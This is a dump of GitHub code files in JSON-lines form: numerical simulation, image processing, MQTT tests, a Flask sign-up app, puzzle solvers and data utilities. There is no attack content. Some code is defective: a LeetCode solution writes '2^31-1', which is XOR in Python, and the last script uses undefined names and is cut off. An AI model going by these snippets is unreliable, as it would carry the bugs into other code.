time_slice_calculated = []\n time_slice_text = []\n for time_slice in (num_seconds_in_a_year, num_seconds_in_a_day, num_seconds_in_an_hour, num_seconds_in_a_minute, 1):\n quotient, remainder = divmod(num_seconds, time_slice)\n if quotient >= 1:\n time_slice_calculated.append(quotient)\n time_slice_text.append(period_text_singular[time_calculation_index] if quotient == 1 else period_text_plural[time_calculation_index])\n num_seconds = remainder\n time_calculation_index += 1\n output_string = ''\n k = 0\n for time_element in time_slice_calculated:\n output_string += (\"{} {}{}\".format(str(time_element), time_slice_text[k], ', ' if len(time_slice_calculated)-k >2 else ' and ' if len(time_slice_calculated)-k == 2 else ''))\n k += 1\n return output_string if output_string else 'none'\n","repo_name":"marygomes/CodeChallenge01","sub_path":"formatTime.py","file_name":"formatTime.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453404995","text":"# \"\"\"\n# This is ArrayReader's API interface.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class ArrayReader:\n# def get(self, index: int) -> int:\n\nclass Solution:\n def search(self, reader: 'ArrayReader', target: int) -> int:\n l, r = 0, 10001\n while l < r:\n m = (l+r-1)//2\n ret = reader.get(m)\n if ret > target or ret == 2^31-1:\n r = m\n else:\n l = m+1\n if l == 0 or reader.get(l-1) != target:\n return -1\n return l-1\n ","repo_name":"jerrt2003/leetcode-in-python","sub_path":"702_Search_in_a_Sorted_Array_of_Unknown_Size/layoff.py","file_name":"layoff.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11662550083","text":"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib.animation import FuncAnimation\nimport sys\nfrom matplotlib import colors\nfrom IPython import embed\nfrom os import path\n\n# We define inverese and direct fft reversely, because the renormalisation\n# makes more sense: the fft should be an integral and thus have a factor 1/n in\n# front of the noise.\nfrom numpy.fft import fft as ifft\nfrom numpy.fft import ifft as fft\n\nclass burgers:\n\t\"\"\"\n\tWe model Burgers' equation via a Galerkin approximation and Neumann\n boundary conditions (so basis of cosines on the interval [0,2 pi])\n\t\"\"\"\n\tdef __init__(self):\n\n\t\t# Initial state of the system in terms of Fourier coefficients:\n\t\t# This is the number of eigenfunctions we use (for the definitions\n\t\t# below to work correctly with the Numpy implementation of the fast\n\t\t# Fourier transform this number should be odd: zeroth + first half positive,\n\t\t# + second half negative modes)\n\t\tself.N = 1601\n\t\t# And we set the time discretization for our problem\n\t\tself.dt = 0.0003\n\t\t# And we set the parameter a for the hyperviscosity (a =1 means\n\t\t# Laplacian: -(-Delta)^a)\n\t\tself.a = 1.0\n\n\t\t# We define the current value in real coordinates\n\t\tself.value1 = 2*np.ones(shape = (self.N))\n\t\tself.value1[self.N//2:self.N] = 0\n\n\t\tself.value2 = 2*np.ones(shape = (self.N))\n\t\tself.value2[0:self.N//2] = 0\n\n\t\t# And on a coarser scale the value for the picture\n\t\tself.V = 701\n\t\tself.visual1 = np.ones(shape = (self.V))\n\t\tself.visual2 = np.ones(shape = (self.V))\n\n\t\t# The initial condition in its Fourier coefficients \n\t\tself.state1 = fft(self.value1)\n\t\tself.state2 = fft(self.value2)\n\n\t\t# Here we store the forces (the nonlinearity and the noise)\n\t\tself.nonli1 = np.zeros(shape = (self.N), dtype = complex)\n\t\tself.nonli2 = np.zeros(shape = (self.N), dtype = complex)\n\t\tself.noise = np.random.normal(loc = 0.0, scale =1.0, size =self.N)\n\n\t\t# We define the gradient as a multiplier in Fourier coordinates\n\t\tself.grad = np.zeros(shape = (self.N), dtype = complex)\n\t\tfor i in range(1,self.N//2+1):\n\t\t\tself.grad[i] = complex(0.0, -1.0*i)\n\t\tfor i in range(self.N//2 + 1, self.N):\n\t\t\tself.grad[i] = complex(0.0, 1.0*(i-self.N//2))\n\n\t\t# We define the resolvent of the fractional Laplacian as a multiplier\n\t\t# in Fourier coordinates\n\t\tself.relap = np.ones(shape = (self.N), dtype = complex)\n\t\tfor i in range(1,self.N//2+1):\n\t\t\tself.relap[i] = complex(1.0/(1.0+(i**(2*self.a))*self.dt), 0.0)\n\t\tfor i in range(self.N//2 + 1, self.N):\n\t\t\tself.relap[i] = complex(1.0/(1.0+((i-self.N//2)**(2*self.a))*self.dt), 0.0)\n\n\tdef evaluate(self):\n\t\t# This function adjourns the value of the real state of the system.\n\t\tself.value1 = ifft(self.state1, self.N).real\n\t\tself.value2 = ifft(self.state2, self.N).real\n\n\tdef visualize(self):\n\t\t# This function adjourns the value of the visualizer\n\t\tself.visual1 = ifft(self.state1, self.V).real\n\t\tself.visual2 = ifft(self.state2, self.V).real\n\n\tdef nonlinearity(self):\n\t\t# We define the nonlinearity d_x u^2 in Fourier coefficients\n\t\tself.evaluate()\n\t\tself.nonli1 = np.multiply(self.grad, fft(self.value1**2, self.N), dtype = complex)\n\t\tself.nonli2 = np.multiply(self.grad, fft(self.value2**2, self.N), dtype = complex)\n\n\tdef renoise(self):\n\t\t# We adjourn the noise\n\t\tself.noise = 0.5*np.random.normal(loc = 0.0, scale =1.0, size\n\t\t\t\t\t\t\t\t=self.N)*np.sqrt(self.N*self.dt)\n\n\tdef solver(self):\n\t\t# We do one more step in the implicit Euler approximation\n\n\t\t# We start by computing the nonlinearity and the noise\n\t\tself.nonlinearity()\n\t\tself.renoise()\n\n\t\tself.state1 = np.multiply(self.relap, self.state1 +\n\t\t\t\t\t\t\tself.dt*(self.nonli1)+ fft(self.noise), dtype = complex)\n\t\tself.state2 = np.multiply(self.relap, self.state2 +\n\t\t\t\t\t\t\tself.dt*(self.nonli2)+ fft(self.noise), dtype = complex)\n\ndef animate(i):\n\n\tglobal bu, space_pts, ax, fig, time_text\n\n\t# Real time is:\n\tani_time = i*bu.dt\n\n\t# Redefine the plot\n\tbu.visualize()\n\tlines_a.set_data(space_pts, np.fft.fftshift(bu.visual1))\n\tlines_b.set_data(space_pts, np.fft.fftshift(bu.visual2))\n\n\t# Set the new time\n\ttime_text.set_text(\"Time = {:2.3f}\".format(ani_time))\n\n\t# We print the step we are in\n\tsys.stdout.flush()\n\tsys.stdout.write(\"\\r Step = {}\".format(i))\n\n\t# And we do the next step:\n\tbu.solver()\n\treturn [lines_a,] + [lines_b,] + [time_text,]\n\nbu = burgers()\nspace_pts = np.linspace(-np.pi, np.pi, bu.V)\n\n# We set up the picture\nfig = plt.figure()\nax = plt.axes(xlim=(-np.pi -0.2, np.pi+0.2), ylim = (-5.0, 5.0))\ntime_text = ax.text(0.05, 0.95,'',horizontalalignment='left',verticalalignment='top', transform=ax.transAxes)\nlines_a, = ax.plot([],[], lw = 1.3)\nlines_b, = ax.plot([],[], lw = 1.3)\nplt.title(\"Hyperviscous Burgers'\")\n\n# We let the animation go.\nani = FuncAnimation(fig, animate, frames= 20000, repeat=False)\nmywriter = animation.FFMpegWriter(fps=20, bitrate=60000, extra_args=['-pix_fmt', 'yuv420p'])\nani.save('burgers.mp4',writer=mywriter)\n","repo_name":"rosati-tom/Simulation-of-some-SPDEs","sub_path":"burgers-viscous.py","file_name":"burgers-viscous.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19850197333","text":"import cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numba import njit\n\ndef increase_brightness(img, value=30):\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n h, s, v = cv.split(hsv)\n\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n\n final_hsv = cv.merge((h, s, v))\n img = cv.cvtColor(final_hsv, cv.COLOR_HSV2BGR)\n return img\n\ndef read_image(path: str):\n image = cv.imread(path)\n image_YUV = cv.cvtColor(cv.resize(image, (1280,720), cv.INTER_CUBIC), cv.COLOR_BGR2YUV)\n # cv.imshow('corners_window0', image_YUV)\n return image, image_YUV\n\ndef step_3_8(img, k_dist=15, rad=5, cor_thrsh = 0.05, use_dilate=True, white=False):\n equ = cv.equalizeHist(img)\n edges = cv.Canny(equ,100,200)\n cv.imshow('Edges', cv.resize(edges, (1280,720)))\n \n # Detector parameters\n blockSize = 2\n apertureSize = 3\n k = 0.04\n\n # Detecting corners\n corners = cv.cornerHarris(equ, blockSize, apertureSize, k)\n\n # Threshold for an optimal value\n mask = corners > cor_thrsh*corners.max()\n img[corners > cor_thrsh*corners.max()]=[0]\n\n # Drawing a circle around corners by given threshold\n for i in range(corners.shape[0]):\n for j in range(corners.shape[1]):\n if mask[i,j]:\n cv.circle(edges, (j,i), rad, (255), -1)\n\n # Showing the result\n if use_dilate:\n edges = cv.dilate(edges, cv.getStructuringElement(cv.MORPH_ELLIPSE, (3, 3)))\n cv.imshow('corners', edges)\n\n dst = cv.distanceTransform(edges, cv.DIST_L2, 3)\n cv.normalize(dst, dst, 0, 1., cv.NORM_MINMAX)\n cv.imshow('Distance Transform Image', cv.resize(dst, (1280,720)))\n integral_img = cv.integral(edges)\n output = adaptive_kernel(equ, integral_img, dst, k_dist, white)\n return output\n\n@njit\ndef adaptive_kernel(orig_img, integral_img, dst_map, k, white=False):\n output = np.empty_like(orig_img)\n for i in range(output.shape[0]):\n for j in range(output.shape[1]):\n ker_size = int(k*dst_map[i][j])\n if ker_size == 0:\n output[i][j] = orig_img[i][j]\n continue\n # clip if coordinates are out of the range\n x1, y1 = max(i - ker_size, 0), max(j - ker_size, 0)\n x2, y2 = min(i + ker_size, output.shape[0]-1), min(j + ker_size, output.shape[1]-1)\n # sum kernel\n left = (integral_img[x2][y1] + integral_img[x1][y2])\n right = (integral_img[x2][y2] + integral_img[x1][y1])\n if white:\n I_sum = right - left\n else:\n I_sum = left - right\n output[i][j] = I_sum/(2*(ker_size)**2)\n return output\n\ndef main():\n _, img = read_image(\"..\\image_example\\house.jpg\")\n output = step_3_8(img[:,:,0], k_dist=20, rad=3, use_dilate=True, white=False)\n output = np.clip(output,0,255)\n img[:,:,0] = output\n img = cv.cvtColor(img, cv.COLOR_YUV2BGR)\n cv.imwrite('final_img.jpg', img)\n cv.waitKey()\n\nif __name__==\"__main__\":\n main()","repo_name":"kprokofi/Computer-vision-tasks","sub_path":"hw_cv_part2/homework2.py","file_name":"homework2.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70347984488","text":"#\n# Testing homie description for apparatus's cameras\n#\n# Author: cdeck3r\n#\n\nimport subprocess\nimport time\nfrom datetime import datetime\n\nimport pytest\n\n\nclass TestHomieApparatusCameras:\n def mqtt_sub(self, pytestconfig, topic, wait=2):\n broker = pytestconfig.getini('mqttbroker')\n process = subprocess.run(\n ['mosquitto_sub', '-h', broker, '-t', topic, '-W', str(wait)],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n # execute process\n return process.stdout.rstrip()\n\n def mqtt_pub(self, pytestconfig, topic, msg):\n broker = pytestconfig.getini('mqttbroker')\n process = subprocess.run(\n ['mosquitto_pub', '-h', broker, '-t', topic, '-m', msg],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n # execute process\n return process.stdout.rstrip()\n\n @pytest.mark.parametrize('waiting_time', [2])\n def test_homie_apparatus_shutter_button(self, pytestconfig, waiting_time):\n msg = self.mqtt_sub(pytestconfig, 'scanner/apparatus/cameras/last-button-push')\n # convert msg in number\n last_button_push = datetime.fromisoformat(msg).timestamp()\n\n # push the shutter-button, and read-out the last-button-push\n time.sleep(waiting_time)\n self.mqtt_pub(\n pytestconfig,\n 'scanner/apparatus/cameras/shutter-button/set',\n 'push',\n )\n time.sleep(waiting_time)\n msg = self.mqtt_sub(pytestconfig, 'scanner/apparatus/cameras/last-button-push')\n assert datetime.fromisoformat(msg).timestamp() > last_button_push\n","repo_name":"cdeck3r/3DScanner","sub_path":"src/homie-nodes/tests/test_homie_apparatus_cameras.py","file_name":"test_homie_apparatus_cameras.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16351768944","text":"from os import listdir, makedirs\n# from os import remove\nfrom os.path import isfile, join, exists\n# from os.path import isdir\nfrom matplotlib.pyplot import subplot, imshow, clf\n# from matplotlib.pyplot import figure, plot\nfrom matplotlib.colors import rgb_to_hsv\nimport matplotlib.image as img\nimport numpy as np\nimport random\nfrom shutil import copyfile\n# from skimage.transform import resize\n# from skimage.morphology import label\n\n\ntraining_path = \"../data/stage1_train\"\n\ndef get_im_with_mask(directory, boundaries=True):\n\n image_dir = join(directory, \"images\")\n mask_dir = join(directory, \"masks\")\n\n image_names = listdir(image_dir)\n mask_names = listdir(mask_dir)\n\n image_path = join(image_dir, image_names[0])\n image = img.imread(image_path)\n\n mask_path = join(mask_dir, mask_names[0])\n mask = img.imread(mask_path)\n if boundaries:\n mask = outline_mask(mask)\n\n for i in range(1, len(mask_names)):\n mask_path = join(mask_dir, mask_names[i])\n if boundaries:\n mask += outline_mask(img.imread(mask_path))\n else:\n mask += img.imread(mask_path)\n return image[:, :, 0:3], mask\n\n\ndef plot_example():\n im, mask = get_example()\n plot_im_mask(im, mask)\n\n\ndef get_example():\n directory = training_path\n names = listdir(directory)\n index = random.randint(0, len(names)-1)\n im, mask = get_im_with_mask(join(directory, names[index]))\n return im, mask\n\n\ndef plot_im_mask(im, mask):\n clf()\n subplot(121)\n imshow(im)\n subplot(122)\n imshow(mask)\n\n\ndef pad_image(im, half):\n\n if len(im.shape) == 3:\n color = [0, 0, 0]\n im = np.stack(\n [np.lib.pad(im[:, :, c], half, mode='constant', constant_values=color[c]) for c in range(3)],\n axis=2\n )\n elif len(im.shape) == 2:\n im = np.lib.pad(im, half, mode=\"constant\")\n else:\n print(\"Unwritten code!!\")\n return im\n\n\ndef run_len_enc(input_matrix):\n num_cols, num_rows = input_matrix.shape\n input_array = np.reshape(input_matrix, [num_cols * num_rows], order='F')\n locations = np.where(input_array == 1)[0]\n run_len = []\n prev = -2\n for loc in locations:\n if loc > prev + 1:\n run_len.extend((loc + 1, 0))\n run_len[-1] += 1\n prev = loc\n return np.array(run_len)\n\n\ndef run_len_dec(input_array, num_cols, num_rows):\n out = np.zeros(num_cols * num_rows)\n n = len(input_array)\n for i in range(n):\n if i % 2 == 0:\n start = input_array[i]-1\n dist = input_array[i+1]\n out[start:start+dist] = 1\n out = np.reshape(out, [num_cols, num_rows], order='F')\n return out\n\n\ndef get_im(directory):\n image_dir = join(directory, \"images\")\n image_names = listdir(image_dir)\n image_path = join(image_dir, image_names[0])\n image = img.imread(image_path)\n\n return image[:, :, 0:3]\n\n\ndef outline_mask(mask, int_value=.5, boundary_value=1):\n output = mask * int_value\n num_rows, num_cols = mask.shape\n row, col = np.where(output == int_value)\n for i in range(len(row)):\n r = row[i]\n c = col[i]\n if r > 0:\n if mask[r-1, c] == 0:\n output[r, c] = boundary_value\n continue\n if r < num_rows-1:\n if mask[r+1, c] == 0:\n output[r, c] = boundary_value\n continue\n if c > 0:\n if mask[r, c-1] == 0:\n output[r, c] = boundary_value\n continue\n if c < num_cols-1:\n if mask[r, c+1] == 0:\n output[r, c] = boundary_value\n continue\n return output\n\n\ndef plot_im_and_mask(im, mask):\n clf()\n subplot(331)\n imshow(im)\n subplot(332)\n imshow(mask)\n subplot(333)\n imshow(rgb2gray(im))\n\n subplot(334)\n imshow(im[:, :, 0])\n subplot(335)\n imshow(im[:, :, 1])\n subplot(336)\n imshow(im[:, :, 2])\n\n nim = rgb_to_hsv(im)\n subplot(337)\n imshow(nim[:, :, 0])\n subplot(338)\n imshow(nim[:, :, 1])\n subplot(339)\n imshow(nim[:, :, 2])\n\n\ndef rgb2gray(rgb):\n gray = 0.2989 * rgb[:, :, 0] + 0.5870 * rgb[:, :, 1] + 0.1140 * rgb[:, :, 2]\n return gray\n\n\ndef save_boundary_images():\n directory = training_path\n image_dir = listdir(directory)\n for image in image_dir:\n path = join(directory, image)\n im, mask_b = get_im_with_mask(path)\n boundary = np.copy(mask_b)\n boundary[boundary == 0.5] = 0\n mask = np.copy(mask_b)\n mask[mask == 0.5] = 1\n np.save(join(path, \"boundary\"), boundary)\n np.save(join(path, \"mask_boundaries\"), mask_b)\n np.save(join(path, \"mask\"), mask)\n\n\ndef generate_train_val_files(percent=0.2):\n directory = training_path\n train_path = 'training.txt'\n val_path = 'validation.txt'\n image_folders = listdir(directory)\n\n train_file = open(train_path, \"w\")\n val_file = open(val_path, \"w\")\n\n for image in image_folders:\n path = directory + \"/\" + image + \"\\n\"\n if random.random() < percent:\n val_file.write(path)\n else:\n train_file.write(path)\n\n train_file.close()\n val_file.close()\n\n\ndef collapse_test():\n directory = training_path\n new_dir = 'all_test'\n if not exists(new_dir):\n makedirs(new_dir)\n name_list = listdir(directory)\n for name in name_list:\n src = join(join(directory, name), join('images', name + '.png'))\n dst = join(new_dir, name + '.png')\n copyfile(src, dst)\n\n\ndef word_to_hot_enc(word):\n labels = [\"boundary\", \"background\", \"interior\"]\n n = len(labels)\n hot = np.zeros(n)\n if word in labels:\n ind = labels.index(word)\n hot[ind] = 1\n else:\n hot = []\n return hot\n\n\ndef get_file_paths(directory):\n files = [directory + '/' + f for f in listdir(directory) if isfile(join(directory, f))]\n return files\n\n\ndef get_file_names(directory):\n files = [f for f in listdir(directory) if isfile(join(directory, f))]\n return files\n","repo_name":"orange-juicers/2018_data_science_bowl","sub_path":"Getting_Started/orange_juicers_utils.py","file_name":"orange_juicers_utils.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74362244006","text":"#!/usr/bin/python\n\nimport os\nfrom utils import get_db\nfrom flask import Flask, render_template, jsonify, request, flash, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom forms import PhoneForm\nfrom itsdangerous import URLSafeTimedSerializer\nimport random\n\n# APP\napp = Flask(__name__)\napp.config.from_object(\"config.DevelopmentConfig\")\nBootstrap(app)\napp.config[\"SECRET_KEY\"] = os.environ[\"SECRET_KEY\"]\nts = URLSafeTimedSerializer(app.config[\"SECRET_KEY\"])\n\n# Static path\nstatic_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"static\"))\n\n# MongoDB\ndb = get_db()\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/privacy')\ndef privacy():\n\treturn render_template('privacy.html')\n\n\n@app.route('/join/', methods=['GET', 'POST'])\n@app.route('/join//', methods=['GET', 'POST'])\ndef join(token):\n\tform = PhoneForm(request.form)\n\tif request.method == 'POST' and form.validate_on_submit():\n\t\tstudent = db.students.find_one(\n\t\t\t{ 'token': token, 'status': { '$in': [ 1, 2, 3, 4 ] } },\n\t\t\t{ '_id': 1 },\n\t\t)\n\t\tif student:\n\t\t\t# Retrieve phone\n\t\t\tphone = request.form['phone'].strip()\n\t\t\tif phone.startswith('0'):\n\t\t\t\tphone = '+353' + phone[1:]\n\t\t\tif phone.startswith('+'):\n\t\t\t\tphone = phone[1:] + '@c.us'\n\t\t\t# Create code\n\t\t\tcode = ''.join([ str(random.randint(0, 9)) for _ in range(6) ])\n\t\t\tresult = db.students.update_one(\n\t\t\t\t{ 'token': token },\n\t\t\t\t{\n\t\t\t\t\t'$set': { \n\t\t\t\t\t\t'phone': phone,\n\t\t\t\t\t\t'code': code,\n\t\t\t\t\t\t'status': 2, # Status: \"Code Shown\"\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t)\n\t\t\tif result.matched_count == 1:\n\t\t\t\t# Show Code\n\t\t\t\treturn redirect(url_for('success', code=code))\n\t\t# Student not found or update could not be made\n\t\treturn redirect(url_for('fail'))\n\treturn render_template('join.html', token=token, form=form)\n\n\n@app.route('/success')\ndef success():\n\tcode = request.args['code']\n\tflash(dict(\n\t\talert_type = 'alert-info',\n\t\ttext = 'CoderBot will talk to you now on WhatsApp, insert the following code to verify it is you: ',\n\t\ttext_bold = code,\n\t\t)\n\t)\n\treturn render_template('base.html')\n\n\n@app.route('/fail')\ndef fail():\n\tflash(dict(\n\t\talert_type = 'alert-danger',\n\t\ttext = 'There was an issue with your request, please email our admin at ',\n\t\ttext_bold = 'predictcs@computing.dcu.ie',\n\t\t)\n\t)\n\treturn render_template('base.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80)","repo_name":"dazcona/code-assistant","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8023910861","text":"#!/usr/bin/env python3\n\nimport copy\nimport sys\n\nfrom graph import *\n\nclass FloorNode(Node):\n def __init__(self, name, value):\n super().__init__(name, value)\n self.risk = sys.maxsize\n\n def visit_neighbors(self):\n to_visit = []\n cost_out = self.risk + self.value\n # print(\"---\")\n # print(self.name, cost_out)\n for edge in self.edges.values():\n node = edge.other_node(self)\n # print(node.name, edge.weight)\n if cost_out < edge.weight:\n edge.weight = cost_out\n to_visit.append(node)\n node.visit(cost_out)\n # print(f'added {node.name}')\n # else:\n # print(f'skipped {node.name}')\n # print(\"---\")\n return to_visit\n\n def visit(self, risk):\n self.risk = min(risk, self.risk)\n\ndef new_grid(old_grid, to_add):\n grid = copy.deepcopy(old_grid)\n for row in range(len(old_grid)):\n for col in range(len(old_grid[row])):\n new_value = (old_grid[row][col] - 1 + to_add) % 9 + 1\n grid[row][col] = new_value\n return grid\n\nif '__main__' == __name__:\n grid = []\n done = False\n\n build_graph = False\n while not done:\n try:\n line = input()\n if 'x5' == line:\n build_graph = True\n continue\n grid.append([int(i) for i in list(line)])\n except:\n done = True\n\n if build_graph:\n grids = {}\n for i in range(9):\n grids[i] = new_grid(grid, i)\n\n # print(grids)\n\n big_grid = []\n for j in range(5):\n for i in range(len(grid[0])):\n big_grid.append(grids[j+0][i] + grids[j+1][i] + grids[j+2][i] + grids[j+3][i] + grids[j+4][i])\n \n # for row in big_grid:\n # for val in row:\n # print(val, end='')\n # print()\n\n grid = big_grid\n\n graph = Graph.from_grid(grid, node_class=FloorNode)\n for edge in graph.edges:\n edge.weight = sys.maxsize\n # print(graph)\n\n # for edge in graph.edges:\n # print(edge)\n\n start_node = graph.node((0,0))\n start_node.risk = 0\n start_node.value = 0\n to_visit = [start_node]\n while to_visit:\n # print([node.name for node in to_visit])\n next_visits = []\n for node in to_visit:\n next_visits += node.visit_neighbors()\n to_visit = list(set(next_visits))\n\n width = len(grid[0])\n height = len(grid)\n # for y in range(height):\n # for x in range(width):\n # print(f'{graph.node((x,y)).risk:02d} ', end='')\n # print()\n\n end_node = graph.node((width-1, height-1))\n print(end_node.risk + end_node.value)\n","repo_name":"messerman/advent_of_code_2021","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10350758234","text":"from collections import defaultdict\nfrom itertools import chain\nfrom typing import Iterator, List, Union\n\nfrom graphql import GraphQLSchema\n\nfrom .build_schema import build_schema_from_type_definitions\nfrom .resolvers import add_resolve_functions_to_schema\n\n\ndef decompose_maps(resolvers_maps: List[dict]) -> Iterator[tuple]:\n def flatten(rm):\n for key, value in rm.items():\n for resolver_name, resolver in value.items():\n yield (key, resolver_name, resolver)\n\n return chain.from_iterable(flatten(m) for m in resolvers_maps)\n\n\ndef merge_resolvers(resolver_list: Iterator[tuple]) -> dict:\n output = defaultdict(dict) # type: dict\n for key, resolver_name, resolver in resolver_list:\n output[key][resolver_name] = resolver\n return output\n\n\ndef join_type_defs(type_defs: List[str]) -> str:\n return \"\\n\\n\".join(t.strip() for t in type_defs)\n\n\ndef make_executable_schema(\n type_defs: Union[str, List[str]], resolvers: Union[dict, List[dict]]\n) -> GraphQLSchema:\n if isinstance(type_defs, list):\n type_defs = join_type_defs(type_defs)\n\n schema = build_schema_from_type_definitions(type_defs)\n\n if isinstance(resolvers, list):\n add_resolve_functions_to_schema(\n schema, merge_resolvers(decompose_maps(resolvers))\n )\n elif isinstance(resolvers, dict):\n add_resolve_functions_to_schema(schema, resolvers)\n\n return schema\n","repo_name":"IvanVrecicDev/Python","sub_path":"ariadne-master/ariadne/executable_schema.py","file_name":"executable_schema.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75389968808","text":"import geojson\nimport json\nimport csv\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\nimport copy as cp\n\nSTATISTICS_FOLDER = \"statistics/\"\nGEOJSON_FOLDER = \"geojson/\"\n\nSTATISTICS_FILE_LOCATION = STATISTICS_FOLDER+\"modelled_nuts1_gva_values.csv\"\nNUTS_REGIONS_FILE = GEOJSON_FOLDER+\"NUTS1_EU.geojson\"\nOUTPUT_NUTS_REGIONS_WITH_STATS = GEOJSON_FOLDER+'MODELLED_NUTS1_EU_GVA.geojson'\n\nSTATISTIC_NAME = 'GVA in Thousands'\nMATPLOTLIB_COLOUR_MAP_TYPE = 'inferno'\n\n\ndef read_csv(file_location):\n statistical_values = {}\n with open(file_location) as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n statistical_values[row[0]]=row[1]\n return statistical_values\n\n\ndef normalise_values(values):\n max_value = max([int(i) for i in values.values()])\n min_value = min([int(i) for i in values.values()])\n for value in values:\n values[value]= (int(values[value]) - min_value)/(max_value - min_value)\n return values\n\n\ndef gather_statistic(statistic_values, geojson):\n nuts_code = geojson.properties[\"NUTS_ID\"]\n return statistic_values.get(nuts_code, 0) # retrieve gva value, sensible default of 0 if not found\n\n\n# OPEN GEOJSON FILE OF NUT3 REGIONS\nwith open(NUTS_REGIONS_FILE) as json_file:\n geo_json_data = geojson.load(json_file)\n\n# READ IN CSV OF STATISTICS FOR NUT3 REGIONS\nunnormalised_values = read_csv(STATISTICS_FILE_LOCATION)\nnormalised_values = normalise_values(cp.copy(unnormalised_values))\n\n#COLOUR MAPPER\nnormalised_max =1\nnormalised_min = 0\nnorm = colors.Normalize(vmin=normalised_min, vmax=normalised_max)\nrgb_colour_mapper = cm.ScalarMappable(norm=norm, cmap=cm.get_cmap(MATPLOTLIB_COLOUR_MAP_TYPE))\n\ndef generate_hex_colour(colour_mapper, value):\n rgb = colour_mapper.to_rgba(value)[:3]\n return '#%02x%02x%02x' % tuple([int(255*colour) for colour in rgb])\n\n# update colour based off statistic and append statistic as property\nfor feature in geo_json_data.features:\n normalised_value = gather_statistic(normalised_values, feature)\n unnormalised_value = gather_statistic(unnormalised_values, feature)\n feature.properties[\"fill\"] = generate_hex_colour(rgb_colour_mapper, normalised_value)\n feature.properties[STATISTIC_NAME] = unnormalised_value\n\n# SAVE FILE TO OUTPUT FILE\nwith open(OUTPUT_NUTS_REGIONS_WITH_STATS, 'w') as output_json_file:\n json.dump(geo_json_data, output_json_file)\n","repo_name":"jwgwalton/geo_json_mapping","sub_path":"generate_statistic_augmented_geojson.py","file_name":"generate_statistic_augmented_geojson.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29004546986","text":"import numpy as np\nfrom utils import gen, chunker, WINDOW_SIZE, rescale_array\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\nfrom sklearn.metrics import f1_score, accuracy_score, classification_report\nfrom glob import glob\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nimport sys\n\nif (len(sys.argv) != 4):\n print(\"error\")\n exit(1)\n\nbase_path = os.path.join(sys.argv[1], sys.argv[2])\nprint(\"BASE PATH\", base_path)\n\nfiles = sorted(glob(os.path.join(base_path, \"*.npz\")))\n\nid = sys.argv[3]\nlist_f1 = []\nlist_acc = []\npreds = []\ngt = []\n\nlabels = ['Wake', 'N1', 'N2', 'N3', 'REM']\n\ntest_ids = {id}\n\ntest = [x for x in files if x.split(\"/\")[-1][:5] in test_ids]\n\nx_test = []\ny_test = []\n\nfor file in test:\n temp = np.load(file)\n x_test.append(np.array(temp[\"x\"]))\n y_test.append(temp[\"y\"])\n\nx_test = np.vstack(x_test)\ny_test = np.hstack(y_test)\nx_test = np.array(x_test).reshape(-1, 3000, 1)\ny_test = np.array(y_test)\n\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\nfrom keras.utils import np_utils\n\nlabel_encoder = LabelEncoder()\nclasses = list(label_encoder.classes_)\n\nlabel_encoder = LabelEncoder()\ny_test = label_encoder.fit_transform(y_test)\nclasses = list(label_encoder.classes_)\ny_test = np_utils.to_categorical(y_test, num_classes=len(labels))\n\nfile_path = \"models/cnn_crf_model_\" + ch + \"_fold\" + str(id) + \".ckpt\"\nmodel.load_weights(file_path)\n\nfor record in tqdm(x_test):\n all_rows = x_test[record]\n record_y_gt = []\n record_y_pred = []\n for batch_hyp in chunker(range(all_rows.shape[0])):\n\n\n X = all_rows[min(batch_hyp):max(batch_hyp)+1, ...]\n Y = y_test[record][min(batch_hyp):max(batch_hyp)+1]\n\n X = np.expand_dims(X, 0)\n\n X = rescale_array(X)\n\n Y_pred = model.predict(X)\n Y_pred = Y_pred.argmax(axis=-1).ravel().tolist()\n\n gt += Y.ravel().tolist()\n preds += Y_pred\n\n record_y_gt += Y.ravel().tolist()\n record_y_pred += Y_pred\n\n\nf1 = 